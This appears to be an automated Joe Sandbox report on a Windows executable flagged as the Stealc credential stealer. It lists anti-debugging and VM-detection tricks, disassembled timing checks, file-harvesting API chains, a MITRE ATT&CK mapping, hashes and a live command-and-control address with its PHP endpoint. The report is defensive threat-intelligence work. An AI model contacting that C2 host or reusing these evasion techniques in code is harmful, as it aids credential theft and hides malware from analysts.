                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130F073 second address: 130F091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007EFEB91CA546h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jp 00007EFEB91CA546h 0x00000016 jns 00007EFEB91CA546h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130F657 second address: 130F672 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB92DE1F5h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130F672 second address: 130F676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130F7C7 second address: 130F7DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007EFEB92DE1E6h 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1315D66 second address: 1315D6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1315D6A second address: 1315D70 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58D020C second address: 58D0212 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58D0212 second address: 58D0216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58D0216 second address: 58D021A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58D021A second address: 58D0284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007EFEB92DE1EAh 0x00000010 or esi, 7F1927E8h 0x00000016 jmp 00007EFEB92DE1EBh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007EFEB92DE1F8h 0x00000022 sbb cl, 00000048h 0x00000025 jmp 00007EFEB92DE1EBh 0x0000002a popfd 0x0000002b popad 0x0000002c mov dword ptr [esp], ebp 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007EFEB92DE1F5h 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58D0284 second address: 58D02B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFEB91CA551h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007EFEB91CA54Eh 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007EFEB91CA54Ah 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58D02B8 second address: 58D02BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58D02FA second address: 58D02FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58D02FE second address: 58D0304 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58D0304 second address: 58D0332 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFEB91CA54Ch 0x00000008 mov di, ax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov dh, E2h 0x00000014 jmp 00007EFEB91CA552h 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58D0332 second address: 58D0338 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58D0338 second address: 58D0346 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58D0346 second address: 58D0376 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007EFEB92DE1EBh 0x0000000a or ax, 081Eh 0x0000000f jmp 00007EFEB92DE1F9h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 58D0376 second address: 58D0386 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFEB91CA54Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122EB1C second address: 122EB23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 122EB23 second address: 122EB2D instructions: 0x00000000 rdtsc 0x00000002 jo 00007EFEB91CA54Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 12242DE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 122A618 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 12B4B01 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E338B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00E338B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E34910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E34910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E2DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00E2DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E2E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00E2E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E34570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00E34570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E2ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00E2ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E216D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E216D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E33EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00E33EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E2F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E2F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E2BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00E2BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E2DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E2DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E21160 GetSystemInfo,ExitProcess,0_2_00E21160
                Source: file.exe, file.exe, 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2190392041.0000000001999000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
                Source: file.exe, 00000000.00000002.2190392041.000000000194E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareNW
                Source: file.exe, 00000000.00000002.2190392041.000000000194E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2190392041.00000000019C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13543
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13546
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13597
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13564
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13557
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E245C0 VirtualProtect ?,00000004,00000100,000000000_2_00E245C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E39860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00E39860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E39750 mov eax, dword ptr fs:[00000030h]0_2_00E39750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E378E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00E378E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 4132, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E39600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00E39600
                Source: file.exe, 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: QlProgram Manager
                Source: file.exeBinary or memory string: DQlProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00E37B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E37980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00E37980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E37850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00E37850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E37A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00E37A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.e20000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2190392041.000000000194E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2138952975.0000000005740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 4132, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.e20000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2190392041.000000000194E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2138952975.0000000005740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 4132, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe53%VirustotalBrowse
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37/ws100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.phpr17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.phpL17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.phpM17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.phpe17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.phpy17%VirustotalBrowse
                http://185.215.113.37/e2b1563c6670f193.phpA17%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.phpMfile.exe, 00000000.00000002.2190392041.00000000019BA000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37/e2b1563c6670f193.phpLfile.exe, 00000000.00000002.2190392041.00000000019C8000.00000004.00000020.00020000.00000000.sdmptrueunknown
                http://185.215.113.37/e2b1563c6670f193.phplfile.exe, 00000000.00000002.2190392041.00000000019BA000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.phprfile.exe, 00000000.00000002.2190392041.00000000019AB000.00000004.00000020.00020000.00000000.sdmptrueunknown
                  http://185.215.113.37Vfile.exe, 00000000.00000002.2190392041.000000000194E000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37/wsfile.exe, 00000000.00000002.2190392041.00000000019AB000.00000004.00000020.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    		unknown
                    http://185.215.113.37/e2b1563c6670f193.phpyfile.exe, 00000000.00000002.2190392041.00000000019BA000.00000004.00000020.00020000.00000000.sdmptrueunknown
                    http://185.215.113.37/e2b1563c6670f193.phpAfile.exe, 00000000.00000002.2190392041.00000000019BA000.00000004.00000020.00020000.00000000.sdmptrueunknown
                    http://185.215.113.37file.exe, 00000000.00000002.2190392041.000000000194E000.00000004.00000020.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    		unknown
                    http://185.215.113.37/e2b1563c6670f193.phpefile.exe, 00000000.00000002.2190392041.00000000019AB000.00000004.00000020.00020000.00000000.sdmptrueunknown
                    http://185.215.113.37/e2b1563c6670f193.php)file.exe, 00000000.00000002.2190392041.00000000019BA000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      185.215.113.37
                      		unknownPortugal
                      		206894WHOLESALECONNECTIONSNLtrue

                      General Information

                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1531486
                      Start date and time:2024-10-11 09:44:31 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 4m 55s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:5
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:file.exe
                      Detection:MAL
                      Classification:mal100.troj.evad.winEXE@1/0@0/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 80%
                      • Number of executed functions: 19
                      • Number of non-executed functions: 88
                      Cookbook Comments:
                      • Found application associated with file extension: .exe

                      Warnings

                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Report size getting too big, too many NtQueryValueKey calls found.

                      Simulations

                      Behavior and APIs

                      No simulations

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php

                      Domains

                      No context

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      No created / dropped files found

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.949311322666154
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:file.exe
                      File size:1'852'416 bytes
                      MD5:1d5102a006a1f46ae6d349ca54497fc3
                      SHA1:9d2909785110f5795d032f46680c4fc173b38740
                      SHA256:aa9447ab2cb7ff4768b9782a6d5a79a71627b2d7c25ca662cd5614128eda50fe
                      SHA512:25ed8d30c6df14c13ed68913a103d546e88373a4b6942945deff1cbcdbdc1dec5bfe2dee9ea461f2030548887d13f9b9fe13929d424181db9d4e6ff9e6c96b6b
                      SSDEEP:49152:hAitgDhNQN40c7meFHojxnaDFKTDjtX5GGxHLOXii:hAiulNoLeFHoVaJPELO
                      TLSH:728533F79EA59853CA8C58F2F8873F9BAC7D4CA841C0E616541C857504F671C22BFBA2
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                      File Icon

                      Icon Hash:00928e8e8686b000

                      Static PE Info

                      General

                      Entrypoint:0xaa1000
                      Entrypoint Section:.taggant
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                      Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:1
                      File Version Major:5
                      File Version Minor:1
                      Subsystem Version Major:5
                      Subsystem Version Minor:1
                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                      Entrypoint Preview

                      Instruction
                      jmp 00007EFEB8C2FB8Ah

                      Rich Headers

                      Programming Language:
                      • [C++] VS2010 build 30319
                      • [ASM] VS2010 build 30319
                      • [ C ] VS2010 build 30319
                      • [ C ] VS2008 SP1 build 30729
                      • [IMP] VS2008 SP1 build 30729
